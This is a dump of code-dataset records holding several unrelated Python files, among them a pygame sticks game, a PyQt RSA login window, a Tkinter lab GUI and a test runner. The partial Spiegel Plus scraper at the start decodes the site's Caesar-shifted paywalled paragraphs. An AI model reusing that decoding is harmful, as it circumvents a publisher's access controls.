teaser_article.find_next('a', title=True).get('title')\n link = teaser_article.find_next('a', href=True).get('href')\n content = self.scrape_article_content(link)\n\n self.json.append(\n {\n 'title': title,\n 'author': author,\n 'link': link,\n 'content': content\n }\n )\n\n #pprint(self.json)\n\n def teaser_content(self):\n req = requests.get(self.site + '/spiegelplus/')\n if req.status_code == 200:\n text = req.text\n\n return BeautifulSoup(text, \"html.parser\").find_all('p', {'class': ['article-intro']})\n\n def scrape_article_content(self, link):\n article_content = []\n article_req = requests.get(self.site + link)\n if article_req.status_code == 200:\n article_text = article_req.text\n\n soup = BeautifulSoup(article_text, \"html.parser\")\n content = soup.find_all(True, {'class': 'article-section'})\n\n for parts in content:\n clear_text = parts.find_all('p', recursive=False)\n obfuscated_text = parts.find_all('p', {'class': 'obfuscated'})\n\n article_content.extend(self.strip_clear_text(clear_text))\n article_content.extend(self.undo_caeser(obfuscated_text))\n\n return article_content\n\n def strip_clear_text(self, clear_text):\n return (''.join(s.strings).strip() for s in clear_text)\n\n def undo_caeser(self, obfuscated_text):\n for ciph in obfuscated_text:\n s = \" \".join(ciph.strings).strip()\n yield ''.join([chr(ord(c) - 1) if c != ' ' else ' ' for c in s])\n","sub_path":"src/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"313702762","text":"\"\"\"\r\nsimple module to save and load compressed pickle files\r\n\"\"\"\r\n\r\nfrom __future__ import absolute_import\r\nimport pickle\r\nimport bz2\r\nimport sys\r\n\r\n \r\ndef save(filename, myobj):\r\n \"\"\"\r\n save object to file using pickle\r\n \r\n @param filename: name of destination file\r\n @type filename: str\r\n @param myobj: object to save (has to be pickleable)\r\n @type myobj: obj\r\n \"\"\"\r\n \r\n try:\r\n f = bz2.BZ2File(filename, 'wb')\r\n except IOError as details:\r\n sys.stderr.write('File ' + filename + ' cannot be written\\n')\r\n sys.stderr.write(details)\r\n return\r\n \r\n pickle.dump(myobj, f, protocol=2)\r\n f.close()\r\n \r\n \r\n \r\ndef load(filename):\r\n \"\"\"\r\n Load from filename using pickle\r\n \r\n @param filename: name of file to load from\r\n @type filename: str\r\n \"\"\"\r\n \r\n try:\r\n f = bz2.BZ2File(filename, 'rb')\r\n except IOError as details:\r\n sys.stderr.write('File ' + filename + ' cannot be read\\n')\r\n sys.stderr.write(details)\r\n return\r\n \r\n myobj = pickle.load(f)\r\n f.close()\r\n return myobj\r\n\r\n\r\n","sub_path":"fastlmm/util/pickle_io.py","file_name":"pickle_io.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"440798517","text":"from tkinter import *\nfrom tkinter import messagebox\nimport threading\n\nimport tkinter_utils\n\n# Window with Label scanning for results... counter for next automatic update..\n# Show forecast button pumps a window with forecasts for the next 2 hours and 1 day ahead\n\n\nclass LabRecommendIoT:\n def __init__(self):\n self.created_thread = threading.main_thread()\n self.main_window = Tk()\n self.main_window.overrideredirect(1)\n self.button_forecast = None\n self.label_report = None\n self.label_report_status = None\n self.button_exit = None\n self.label_mail_service = None\n self.label_report_header = None\n self.label_info = None\n self.init_window()\n tkinter_utils.center_window(self.main_window, 450, 300)\n self.recently_temperature_status = None\n self.label_signature = None\n self.forecast_next_day_temperature_status = None\n self.forecast_2hour_temperature_status = None\n self.recently_noise_status = None\n self.forecast_next_day_noise_status = None\n self.forecast_2hour_noise_status = None\n self.temperature_updated = False\n self.noise_updated = False\n\n def run(self):\n self.main_window.mainloop()\n\n def init_window(self):\n self.button_forecast = Button(self.main_window, text=\"Show Forecast\", command=self.show_forecast)\n self.button_forecast.place(x=100, y=250)\n\n self.button_exit = Button(self.main_window, text=\"Exit Lab\", command=self.exit_lab)\n self.button_exit.place(x=300, y=250)\n\n self.label_info = Label(self.main_window, text=\"Welcome to Lab Recommendation!\")\n self.label_info.place(x=130, y=30)\n\n self.label_signature = Label(self.main_window, text=\"Niv&Gal Lab Recommendation Systems\")\n self.label_signature.place(x=5, y=0)\n\n self.label_report_header = Label(self.main_window, text='Report:')\n self.label_report_header.place(x=200, y=100)\n\n self.label_report_status = Label(self.main_window,\n text=\"Fetching lab conditions for you right now.. Hold on\")\n self.label_report_status.place(x=100, y=50)\n\n self.label_report = Label(self.main_window)\n\n self.label_mail_service = Label(self.main_window,\n text=\"For our mail service, contact us at nivjamp@walla.com.\")\n self.label_mail_service.place(x=5, y=280)\n\n self.main_window.configure(background='cyan')\n for child_control in self.main_window.winfo_children():\n child_control.configure(background='cyan')\n child_control['font'] = 'Helvetica 10'\n\n self.label_report_header['font'] = 'Helvetica 10 bold underline'\n self.label_signature['font'] = 'calibri 10 italic'\n self.label_mail_service['font'] = 'calibri 10 italic'\n\n def set_temperature(self, temperature_status, query_name):\n if query_name == 'recently':\n self.recently_temperature_status = temperature_status\n elif query_name == 'next_day':\n self.forecast_next_day_temperature_status = temperature_status\n elif query_name == 'next_2_hours':\n self.forecast_2hour_temperature_status = temperature_status\n\n self.temperature_updated = True\n report = self.show_updated_report_if_available(self.recently_temperature_status,\n self.recently_noise_status, False)\n if report is not None:\n self.label_report['text'] = report\n\n def set_noise(self, noise_status, query_name):\n if query_name == 'recently':\n self.recently_noise_status = noise_status\n elif query_name == 'next_day':\n self.forecast_next_day_noise_status = noise_status\n elif query_name == 'next_2_hours':\n self.forecast_2hour_noise_status = noise_status\n\n self.noise_updated = True\n report = self.show_updated_report_if_available(self.recently_temperature_status,\n self.recently_noise_status, False)\n if report is not None:\n self.label_report['text'] = report\n\n def set_light(self, temperature_status, query_name):\n pass\n\n def set_proximity(self, proximity_status, query_name):\n pass\n\n def show_forecast(self):\n forecast_2hours = self.show_updated_report_if_available(\n self.forecast_next_day_temperature_status, self.forecast_next_day_noise_status, True)\n forecast_tomorrow = self.show_updated_report_if_available(\n self.forecast_2hour_temperature_status, self.forecast_2hour_noise_status, True)\n if forecast_tomorrow is not None and forecast_2hours is not None:\n messagebox.showinfo(\"Forecast\", \"Forecast in 2 hours: {0}\\nForecast tomorrow: {1}\"\n .format(forecast_2hours, forecast_tomorrow))\n else:\n messagebox.showinfo(\"Forecast not ready\", \"Hold on! Forecast not ready yet.\")\n\n def exit_lab(self):\n self.main_window.withdraw()\n self.main_window.quit()\n\n def show_updated_report_if_available(self, temp_to_check, noise_to_check, is_forecast):\n if not (self.noise_updated and self.temperature_updated):\n return None\n self.label_report_status['text'] = 'Report ready! Automatic updates every 30 seconds.'\n is_normal_temp = temp_to_check == 'normal'\n is_normal_noise = noise_to_check == 'normal'\n\n if is_normal_noise and is_normal_temp:\n report = 'Lab conditions are good! You should go now.'\n self.label_report.place(x=100, y=120)\n\n else:\n self.label_report.place(x=130, y=120)\n report = '\\nLab conditions are not good.\\n'\n if not is_normal_noise:\n report += 'It is too noisy,'\n else:\n report += 'It is not noisy, but'\n if not is_normal_temp:\n report += ' temperature is extreme.'\n else:\n report += ' but temperature is fine.'\n\n if not is_forecast:\n report += '\\nCheck our conditions Forecast.'\n\n return report\n\n\n","sub_path":"lab_recommend.py","file_name":"lab_recommend.py","file_ext":"py","file_size_in_byte":6220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"267317676","text":"import sys\n\ndef findLabOrder(Path):\n textData = open(Path,'r')\n lineData = textData.readlines() #lineData is each line in txt file\n lineOrder = []\n for line in lineData:\n posFind = line.find('Found order:')\n if posFind != -1:\n newLine = line[posFind+13:-5]\n newLine = newLine.rstrip('\\n')\n lineOrder.append(newLine)\n RemoveDupList(lineOrder)\n return lineData, lineOrder\n\ndef RemoveDupList(seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if not (x in seen or seen_add(x))]\n\n\n\n\n\n\n \n \n ","sub_path":"model/ReadLogs.py","file_name":"ReadLogs.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"93808951","text":"# Cubes\nimport matplotlib.pyplot as plt\n\nx_val = range(1,5001)\ny_val = [x**3 for x in x_val]\n\nplt.scatter(x_val, y_val,\n s=20,\n c='red',\n edgecolor='none')\n\nplt.xlabel('Root',fontsize=10)\nplt.ylabel('Cubes',fontsize=10)\nplt.title('Cubes of 1-5000')\nplt.tick_params(axis='both',which='major')\n\nplt.savefig('ex15-11.png', bbox_inches='tight')\nplt.show()\n","sub_path":"data_visualization/ex15-1.py","file_name":"ex15-1.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"1255143","text":"import pygame\nimport random\nimport sys\nfrom sys import maxsize\n\nclass Node(object):\n def __init__(self, i_depth, i_playerNum, i_sticksRemaining, i_value = 0):\n self.i_depth = i_depth\n self.i_playerNum = i_playerNum\n self.i_sticksRemaining = i_sticksRemaining\n self.i_value = i_value\n self.children = []\n self.CreateChildren()\n\n def CreateChildren(self):\n if self.i_depth >= 0:\n for i in range(1, 3):\n v = self.i_sticksRemaining - i\n self.children.append( Node( self.i_depth - 1,-self.i_playerNum, v, self.RealVal(v)))\n \n \n def RealVal(self, value):\n if (value == 0):\n return maxsize * self.i_playerNum\n elif (value < 0):\n return maxsize * -self.i_playerNum\n return 0\n\ndef MinMax(node, i_depth, i_playerNum):\n if(i_depth == 0) or (abs(node.i_value) == maxsize):\n return node.i_value\n i_bestValue = maxsize * -i_playerNum\n\n for i in range(len(node.children)):\n child = node.children[i]\n i_val = MinMax(child, i_depth -1, -i_playerNum)\n if (abs(maxsize * i_playerNum - i_val) < abs(maxsize * i_playerNum - i_bestValue)):\n i_bestValue = i_val\n return i_bestValue\n\ndef WinCheck(i_sticks, i_playerNum):\n if i_sticks <= 0:\n print(\"*\"*30)\n if i_playerNum > 0:\n if i_sticks == 0:\n endscreen(0)\n else:\n if i_sticks == 0:\n endscreen(1)\n print(\"*\"*30)\n return 0\n return 1\n\ndef text_objects(text, font):\n textSurface = font.render(text, True, (255,255,255))\n return textSurface, textSurface.get_rect()\n\ndef linspace(a, b, n=100):\n if n < 2:\n return b\n diff = (float(b) - a)/(n - 1)\n return [diff * i + a for i in range(n)]\n\ndef intro():\n\tlbx = 200\n\twidth = 150\n\theight = 75\n\trbx = scw - lbx - width\n\tbby = sch - height - 20\n\trun = True\n\twhile run:\n\t\tclock.tick(30)\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tsys.exit()\n\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\tif (lbx + width) > mouse[0] > lbx and (bby + height) > mouse[1] > bby:\n\t\t\t\t\tif event.button == 1:\n\t\t\t\t\t\trun = False\n\t\t\t\telif (rbx + width) > mouse[0] > rbx and (bby + height) > mouse[1] > bby:\n\t\t\t\t\tsys.exit()\n\n\t\t\twin.blit(startscreen, (0, 0))\n\t\t\tmouse = pygame.mouse.get_pos()\n\n\t\t\tif (lbx + width) > mouse[0] > lbx and (bby + height) > mouse[1] > bby:\n\t\t\t\tpygame.draw.rect(win, (LIGHT_GREEN), (lbx, bby, width, height))\n\t\t\telse:\n\t\t\t\tpygame.draw.rect(win, (GREEN), (lbx, bby, width, height))\n\n\t\t\tif (rbx + width) > mouse[0] > rbx and (bby + height) > mouse[1] > bby:\n\t\t\t\tpygame.draw.rect(win, (LIGHT_RED), (rbx, bby, width, height))\n\t\t\telse:\n\t\t\t\tpygame.draw.rect(win, (RED), (rbx, bby, width, height))\n\n\t\t\tsmallText = pygame.font.Font(\"freesansbold.ttf\",35)\n\t\t\ttextSurf, textRect = text_objects(\"Играть!\", smallText)\n\t\t\ttextRect.center = (lbx + width/2, bby + height/2)\n\t\t\twin.blit(textSurf, textRect)\n\n\t\t\tsmallText = pygame.font.Font(\"freesansbold.ttf\",35)\n\t\t\ttextSurf, textRect = text_objects(\"Выйти\", smallText)\n\t\t\ttextRect.center = (rbx + width/2, bby + height/2)\n\t\t\twin.blit(textSurf, textRect)\n\t\t\tpygame.display.update()\n\ndef endscreen(w):\n\tlbx = 200\n\twidth = 150\n\theight = 75\n\trbx = scw - lbx - width\n\tbby = sch - height - 20\n\trun = True\n\twin.blit(fade, (0,0))\n\twhile run:\n\t\tclock.tick(30)\n\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tsys.exit()\n\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\tif (lbx + width) > mouse[0] > lbx and (bby + height) > mouse[1] > bby:\n\t\t\t\t\tif event.button == 1:\n\t\t\t\t\t\tgame()\n\t\t\t\telif (rbx + width) > mouse[0] > rbx and (bby + height) > mouse[1] > bby:\n\t\t\t\t\tsys.exit()\n\t\t\t\n\t\t\tmouse = pygame.mouse.get_pos()\n\n\t\t\tif (lbx + width) > mouse[0] > lbx and (bby + height) > mouse[1] > bby:\n\t\t\t\tpygame.draw.rect(win, (LIGHT_GREEN), (lbx, bby, width, height))\n\t\t\telse:\n\t\t\t\tpygame.draw.rect(win, (GREEN), (lbx, bby, width, height))\n\n\t\t\tif (rbx + width) > mouse[0] > rbx and (bby + height) > mouse[1] > bby:\n\t\t\t\tpygame.draw.rect(win, (LIGHT_RED), (rbx, bby, width, height))\n\t\t\telse:\n\t\t\t\tpygame.draw.rect(win, (RED), (rbx, bby, width, height))\n\n\t\t\tif w == 0:\n\t\t\t\twin.blit(humanwon, (307, 50))\n\t\t\t\tsmallText = pygame.font.Font(\"freesansbold.ttf\",30)\n\t\t\t\ttextSurf, textRect = text_objects(\"Eще раз!\", smallText)\n\t\t\t\ttextRect.center = (lbx + width/2, bby + height/2)\n\t\t\t\twin.blit(textSurf, textRect)\n\t\t\telse:\n\t\t\t\twin.blit(compwon, (307, 50))\n\t\t\t\tsmallText = pygame.font.Font(\"freesansbold.ttf\",35)\n\t\t\t\ttextSurf, textRect = text_objects(\"Реванш!\", smallText)\n\t\t\t\ttextRect.center = (lbx + width/2, bby + height/2)\n\t\t\t\twin.blit(textSurf, textRect)\n\n\t\t\tsmallText = pygame.font.Font(\"freesansbold.ttf\",35)\n\t\t\ttextSurf, textRect = text_objects(\"Выйти\", smallText)\n\t\t\ttextRect.center = (rbx + width/2, bby + height/2)\n\t\t\twin.blit(textSurf, textRect)\n\t\t\tpygame.display.update()\n\ndef game():\n\ti_stickTotal = 16\n\ti_depth = 10\n\ti_curPlayer = 1\n\twidth = 63\n\theight = 215\n\tsbh = 70\n\tsbw = 140\n\tsbx = scw/2-sbw/2\n\tsby = sch-sbh*11/10\n\tsc = 0\n\tx = linspace(width/2, scw - width*3/2, i_stickTotal)\n\ty = []\n\tp = []\n\tfor i in range(i_stickTotal):\n\t\ty.append(150)\n\t\tp.append(1)\n\n\trun = True\n\twhile run:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tsys.exit()\n\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\tfor i in range(len(x)):\n\t\t\t\t\tif (x[i] + width) > event.pos[0] > x[i] and (y[i] + height) > event.pos[1] > y[i]:\n\t\t\t\t\t\tif event.button == 1:\n\t\t\t\t\t\t\tif sc < 2:\n\t\t\t\t\t\t\t\tif p[i] == 1:\n\t\t\t\t\t\t\t\t\ty[i] += 50 * p[i]\n\t\t\t\t\t\t\t\t\tp[i] *= -1\n\t\t\t\t\t\t\t\t\tsc += 1\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\ty[i] += 50 * p[i]\n\t\t\t\t\t\t\t\t\tp[i] *= -1\n\t\t\t\t\t\t\t\t\tsc -= 1\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tif p[i] == -1:\n\t\t\t\t\t\t\t\t\ty[i] += 50 * p[i]\n\t\t\t\t\t\t\t\t\tp[i] *= -1\n\t\t\t\t\t\t\t\t\tsc-=1\n\n\t\t\tif event.type == pygame.MOUSEBUTTONDOWN and sc != 0:\n\t\t\t\tif (sbx + sbw) > event.pos[0] > sbx and (sby + sbh) > event.pos[1] > sby:\n\t\t\t\t\tif event.button == 1:\n\t\t\t\t\t\tfor k in range(len(p)):\n\t\t\t\t\t\t\tif p[k] == -1:\n\t\t\t\t\t\t\t\tspeed = 4\n\t\t\t\t\t\t\t\twhile y[k] < 600:\n\t\t\t\t\t\t\t\t\tclock.tick(60)\n\t\t\t\t\t\t\t\t\twin.blit(bg, (0, 0))\n\t\t\t\t\t\t\t\t\tfor i in range(len(x)):\n\t\t\t\t\t\t\t\t\t\twin.blit(stick, (x[i], y[i], width, height))\n\t\t\t\t\t\t\t\t\ty[k] += speed\n\t\t\t\t\t\t\t\t\tspeed *=12/10\n\t\t\t\t\t\t\t\t\tpygame.display.update()\n\t\t\t\t\t\ti_stickTotal -= sc\n\t\t\t\t\t\tWinCheck(i_stickTotal, i_curPlayer)\n\t\t\t\t\t\tsc = 0\n\t\t\t\t\t\tam = []\n\t\t\t\t\t\tfor i in range(len(x)):\n\t\t\t\t\t\t\tif y[i] == 150:\n\t\t\t\t\t\t\t\tam.append(i)\n\t\t\t\t\t\ti_curPlayer *= -1\n\t\t\t\t\t\tnode = Node(i_depth, i_curPlayer, i_stickTotal)\n\t\t\t\t\t\tbestChoice = -100\n\t\t\t\t\t\ti_bestValue = -i_curPlayer * maxsize\n\t\t\t\t\t\tfor i in range(len(node.children)):\n\t\t\t\t\t\t\tn_child = node.children[i]\n\t\t\t\t\t\t\ti_val = MinMax(n_child, i_depth, -i_curPlayer)\n\t\t\t\t\t\t\tif (abs(i_curPlayer * maxsize - i_bestValue)):\n\t\t\t\t\t\t\t\ti_bestValue = i_val\n\t\t\t\t\t\t\t\tbestChoice = i\n\t\t\t\t\t\tbestChoice += 1\n\t\t\t\t\t\tc_choice = bestChoice\n\t\t\t\t\t\twhile c_choice > 0:\n\t\t\t\t\t\t\tcc = random.choice(am)\n\t\t\t\t\t\t\tspeed = 4\n\t\t\t\t\t\t\twhile y[cc] > -100 - height:\n\t\t\t\t\t\t\t\tclock.tick(60)\n\t\t\t\t\t\t\t\twin.blit(bg, (0, 0))\n\t\t\t\t\t\t\t\tfor i in range(len(x)):\n\t\t\t\t\t\t\t\t\twin.blit(stick, (x[i], y[i], width, height))\n\t\t\t\t\t\t\t\ty[cc] -= speed\n\t\t\t\t\t\t\t\tspeed *=12/10\n\t\t\t\t\t\t\t\tpygame.display.update()\n\t\t\t\t\t\t\tc_choice -= 1\n\t\t\t\t\t\t\tam.remove(cc)\n\t\t\t\t\t\ti_stickTotal -= bestChoice\n\t\t\t\t\t\tWinCheck(i_stickTotal, i_curPlayer)\n\t\t\t\t\t\ti_curPlayer *= -1\n\n\t\t\tmouse = pygame.mouse.get_pos()\n\t\t\twin.blit(bg, (0, 0))\n\t\t\tfor i in range(len(x)):\n\t\t\t\tif (x[i] + width) > mouse[0] > x[i] and (y[i] + height) > mouse[1] > y[i]:\n\t\t\t\t\tif sc < 2:\n\t\t\t\t\t\twin.blit(stick, (x[i]-5, y[i]-5, width+75, height+75))\n\t\t\t\t\telse:\n\t\t\t\t\t\tif y[i] == 200:\n\t\t\t\t\t\t\twin.blit(stick, (x[i]-5, y[i]-5, width+75, height+75))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\twin.blit(stick, (x[i], y[i], width, height))\n\t\t\t\telse:\n\t\t\t\t\twin.blit(stick, (x[i], y[i], width, height))\n\n\t\t\tif (sbx + sbw) > mouse[0] > sbx and (sby + sbh) > mouse[1] > sby:\n\t\t\t\tpygame.draw.rect(win, (LIGHT_GREEN), (sbx, sby, sbw, sbh))\n\t\t\telse:\n\t\t\t\tpygame.draw.rect(win, (GREEN), (sbx, sby, sbw, sbh))\n\n\t\t\tsmallText = pygame.font.Font(\"freesansbold.ttf\",30)\n\t\t\ttextSurf, textRect = text_objects(\"Палочек осталось - \" + str(i_stickTotal), smallText)\n\t\t\ttextRect.center = (1000,50)\n\t\t\t#win.blit(textSurf, textRect)\n\n\t\t\tsmallText = pygame.font.Font(\"freesansbold.ttf\",40)\n\t\t\ttextSurf, textRect = text_objects(\"Взять\", smallText)\n\t\t\ttextRect.center = ((sbx+(sbw/2)),sby+(sbh/2))\n\t\t\twin.blit(textSurf, textRect)\n\t\t\tpygame.display.update()\n\npygame.init()\nscw = 1138\nsch = 520\nwin = pygame.display.set_mode((scw, sch))\nclock = pygame.time.Clock()\npygame.display.set_caption(\"Sticks Game\")\nstick = pygame.image.load('res/stick.png')\nbg = pygame.image.load('res/background.png')\nstartscreen = pygame.image.load('res/startscreen.png')\ncompwon = pygame.image.load('res/compwon.png')\nhumanwon = pygame.image.load('res/humanwon.png')\nfade = pygame.Surface((scw, sch))\nfade.fill((0,0,0))\nfade.set_alpha(150)\nLIGHT_GREEN = (20, 255, 42)\nGREEN = (20, 200, 40)\nLIGHT_RED = (255, 10, 10)\nRED = (200, 20, 20)\n\nintro()\ngame()\npygame.quit()\n","sub_path":"sticks.py","file_name":"sticks.py","file_ext":"py","file_size_in_byte":9064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"478521327","text":"if REQUEST is None:\n REQUEST = context.REQUEST\nif response is None:\n response = REQUEST.RESPONSE\n\nweb_section = context\n\nif REQUEST.getHeader('If-Modified-Since', '') == web_section.getModificationDate().rfc822():\n response.setStatus(304)\n return \"\"\n\nresponse.setHeader('Content-Type', 'text/cache-manifest')\nresponse.setHeader('Cache-Control', 'max-age=0, public, must-revalidate')\n\nreturn \"\"\"CACHE MANIFEST\n# %s + hash\"\"\" % context.getLayoutProperty(\"configuration_latest_version\", default=\"development\")\n","sub_path":"bt5/erp5_officejs_appstore_base/SkinTemplateItem/portal_skins/erp5_officejs_appstore_base/WebSection_renderOfficeJSRedirectAppCache.py","file_name":"WebSection_renderOfficeJSRedirectAppCache.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"484034129","text":"# -*- coding: cp1251 -*-\n__author__ = 'whoami'\n__version__ = \"1.2.4\"\n\n\"\"\"\nОкно входа или регистрации.\n\"\"\"\n\nimport sys\nfrom re import match\nfrom threading import Thread\nfrom PyQt4 import QtGui, QtCore\nfrom os import path, getcwd\nfrom key_gen import encode_md5, rsa_gen_key, rsa_load_key\nfrom .message_box import message_box\nfrom config_read import read_cfg\n\n\nclass RegWnd(QtGui.QWidget):\n def __init__(self, db, app, parent=None):\n \"\"\"\n\n :param db: instance db.DataBase\n :param app: QtGui.QApplication\n :param parent:\n :return:\n \"\"\"\n super().__init__(parent)\n self.db = db\n self.pubkey = None\n self.privkey = None\n self.pubkey_in_md5 = None\n self.username = None\n self.app = app\n self.res = read_cfg(\"resources.ini\", \"welcome\")\n self.icon_wnd = QtGui.QIcon(self.res[\"icon\"])\n\n self.setWindowTitle(self.res[\"title\"])\n self.setWindowIcon(self.icon_wnd)\n self.setFixedSize(250, 200)\n\n self.label = QtGui.QLabel(self.res[\"msg_welcome\"])\n self.label.setObjectName(\"welcome\")\n self.label.setWordWrap(True)\n\n self.edit = QtGui.QLineEdit()\n self.edit.setPlaceholderText(self.res[\"edit_holder_text\"])\n\n self.btn_ok = QtGui.QPushButton(self.res[\"btn_ok\"])\n\n self.btn_cancel = QtGui.QPushButton(self.res[\"btn_cancel\"])\n\n self.box_label = QtGui.QHBoxLayout()\n self.box_label.addWidget(self.label)\n\n self.box_edit = QtGui.QHBoxLayout()\n self.box_edit.addWidget(self.edit)\n\n self.box_buttons = QtGui.QHBoxLayout()\n self.box_buttons.addWidget(self.btn_ok)\n self.box_buttons.addWidget(self.btn_cancel)\n\n self.vbox = QtGui.QVBoxLayout()\n self.vbox.addLayout(self.box_label)\n self.vbox.addLayout(self.box_edit)\n self.vbox.addLayout(self.box_buttons)\n\n self.setLayout(self.vbox)\n self.set_signals()\n self.set_animation()\n self.show()\n\n def set_animation(self):\n self.animation = QtCore.QStateMachine()\n\n state_start = QtCore.QState()\n state_end = QtCore.QState()\n\n state_start.assignProperty(self.label, \"geometry\",\n QtCore.QRect(20, -29, 200, 200))\n state_end.assignProperty(self.label, \"geometry\",\n QtCore.QRect(21, -29, 200, 200))\n\n state_start.addTransition(self.btn_ok,\n QtCore.SIGNAL(\"clicked()\"), state_end)\n state_end.addTransition(self.btn_ok,\n QtCore.SIGNAL(\"clicked()\"), state_start)\n\n label_anim = QtCore.QPropertyAnimation(self.label, \"geometry\")\n label_anim.setEasingCurve(QtCore.QEasingCurve.InOutElastic)\n label_anim.setDuration(700)\n\n self.animation.addState(state_start)\n self.animation.addState(state_end)\n self.animation.setInitialState(state_start)\n self.animation.addDefaultAnimation(label_anim)\n self.animation.start()\n\n def set_signals(self):\n self.btn_ok.clicked.connect(self.btn_ok_click)\n self.btn_cancel.clicked.connect(self.btn_cancel_click)\n self.connect(self.edit, QtCore.SIGNAL(\"returnPressed()\"),\n self.btn_ok.click)\n\n def sign_up(self, username):\n\n def confirm(login):\n return message_box(\n self.res[\"confirm_text\"].format(login),\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.No,\n QtGui.QMessageBox.Question,\n self.res[\"confirm_title\"],\n self.icon_wnd\n )\n\n pattern = r\"[0-9A-Za-z]{4,}\"\n result = match(pattern, username)\n if not result or len(result.group()) != len(username):\n return False\n\n if self.db.check_user(username) and confirm(username):\n result = [None]\n t1 = Thread(target=self.get_keys, args=(result,))\n t1.start()\n self.label.setText(self.res[\"msg_gen_start\"])\n # wait thread\n self.setEnabled(False)\n while t1.isAlive():\n self.app.processEvents()\n self.setEnabled(True)\n\n if result[0]:\n return self.db.insert_users(\n [self.pubkey_in_md5, username]\n )\n else:\n return False\n else:\n return False\n\n def sign_in(self, dir):\n if self.get_keys(dir=dir):\n return self.db.sign_in(self.pubkey_in_md5)\n else:\n return None\n\n def get_keys(self, result=None, dir=None):\n self.pubkey = None\n self.privkey = None\n self.pubkey_in_md5 = None\n self.username = None\n\n if dir:\n self.pubkey, self.privkey = rsa_load_key(dir=dir)\n else:\n self.pubkey, self.privkey = rsa_gen_key()\n\n if self.pubkey and self.privkey:\n self.pubkey_in_md5 = encode_md5(self.pubkey.save_pkcs1())\n if result: result[0] = True\n return True\n else:\n if result: result[0] = False\n return False\n\n def btn_ok_click(self):\n username = self.edit.text()\n if not username:\n username = getcwd()\n if path.exists(username):\n self.username = self.sign_in(username)\n if not self.username:\n self.label.setText(self.res[\"msg_wrong_key\"])\n else:\n self.close()\n else:\n if not self.sign_up(username):\n self.label.setText(self.res[\"msg_gen_end\"])\n else:\n self.username = username\n self.close()\n\n def btn_cancel_click(self):\n self.close()\n\n\ndef register(db, style=None):\n app = QtGui.QApplication([])\n app.setStyle(\"Plastique\")\n app.setStyleSheet(style)\n\n wnd = RegWnd(db, app)\n\n app.exec_()\n\n return wnd.pubkey, wnd.privkey, wnd.username","sub_path":"build/2.2.5/gui/welcome.py","file_name":"welcome.py","file_ext":"py","file_size_in_byte":6012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"5968624","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n# vim: ts=4 sw=4 expandtab ai\n\nimport glob\nimport os\nimport subprocess\nimport sys\n\nfrom optparse import OptionParser\n\n# Borrowed from https://github.com/pulp/pulp/blob/master/run-tests.py\n# Find and eradicate any existing .pyc files, so they do not eradicate us!\nPROJECT_DIR = os.path.abspath(os.path.curdir)\n\nsubprocess.call(['find', PROJECT_DIR, '-name', '*.pyc', '-delete'])\n\nTESTS = [\n 'test_ActivationKeys',\n 'test_ContentViews',\n 'test_ContentViewDefinitions',\n 'test_Environments',\n 'test_Organizations',\n 'test_Providers',\n 'test_SystemGroups',\n 'test_Systems',\n 'test_Users',\n ]\n\nparser = OptionParser()\n\nparser.add_option('-s', '--host', type=str, dest='host', help='Server url')\nparser.add_option('-u', '--username', type=str, dest='username', default='admin', help='Valid system username')\nparser.add_option('-p', '--password', type=str, dest='password', default='admin', help='Valid system user password')\nparser.add_option('--project', type=str, dest='project', default='/katello', help='Project can be either \"katello\" or \"headpin\"')\nparser.add_option('--port', type=str, dest='port', default='443', help='Server port, defaults to 443')\nparser.add_option('--verbose', type='choice', choices=['1', '2', '3', '4', '5'], default=1, help='Debug verbosity level')\nparser.add_option('--katello-src', type=str, dest='src', default='/usr/lib/python2.6/site-packages/katello/client/api', help='Location for Katello\\'s source code.')\n\n(options, ignored_options) = parser.parse_args()\n\nos.environ['KATELLO_HOST'] = options.host\nos.environ['KATELLO_USERNAME'] = options.username\nos.environ['KATELLO_PASSWORD'] = options.password\nos.environ['PROJECT'] = options.project\nos.environ['KATELLO_PORT'] = options.port\nos.environ['VERBOSITY'] = str(options.verbose)\n\nPACKAGES = [x.split('/')[-1][:-3] for x in glob.glob(\"%s/*.py\" % options.src) if 'init' not in x]\n\nenv = os.environ.copy()\n\nparams = [\n 'nosetests',\n '--verbose',\n '--with-xunit',\n '--with-coverage',\n '--cover-html',\n '--cover-erase',\n '--cover-package',\n \",\".join([\"katello.client.api.%s\" % x for x in PACKAGES]),\n \"--tests\",\n \",\".join([\"tests.%s\" % x for x in TESTS]),\n ]\n\nsubprocess.call(params, env=env)\n","sub_path":"run-tests.py","file_name":"run-tests.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"150277994","text":"import threading\nimport logging\nfrom websocket_server import WebsocketServer\n\"\"\" WebSocket service \nRuns on a separate thread, supports 